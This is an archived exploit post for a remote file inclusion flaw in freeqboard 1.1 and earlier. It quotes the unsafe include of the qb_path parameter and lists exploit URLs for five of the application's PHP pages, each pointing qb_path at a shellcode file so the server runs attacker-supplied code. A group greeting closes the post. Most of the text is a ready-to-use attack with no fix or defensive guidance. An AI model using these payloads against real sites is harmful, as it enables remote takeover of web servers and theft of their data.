TUCoPS :: Web BBS :: etc :: c07-1111.htm

freeqboard <= 1.1 (qb_path) Remote File Include Vulnerability
freeqboard <= 1.1 (qb_path) Remote File Include Vulnerability
freeqboard <= 1.1 (qb_path) Remote File Include Vulnerability

# freeqboard <= 1.1 (qb_path) Remote File Include Vulnerability              
# Author: Mr.3FReeT                                                          
# Softname: freeqboard                                                       
# code in :
# about.php  ,  contact.php  ,  delete.php  ,  faq.php  ,  index.php
# include "config.php";
# include $qb_path."incs/mysql.php";
# Exploit :
# """"""""
# www.site.com/[path]/index.php?qb_path=shellcode.txt? 
# www.site.com/[path]/faq.php?qb_path=shellcode.txt? 
# www.site.com/[path]/delete.php?qb_path=shellcode.txt? 
# www.site.com/[path]/contact.php?qb_path=shellcode.txt? 
# www.site.com/[path]/about.php?qb_path=shellcode.txt? 
# GreeTz: [ Dr.2 ] , [ ToOoFa ] , [ General C ] , [ asbmay ] , [ q8i^rock ] 
, [ SHiKaA ] & KuW SeC TeaM

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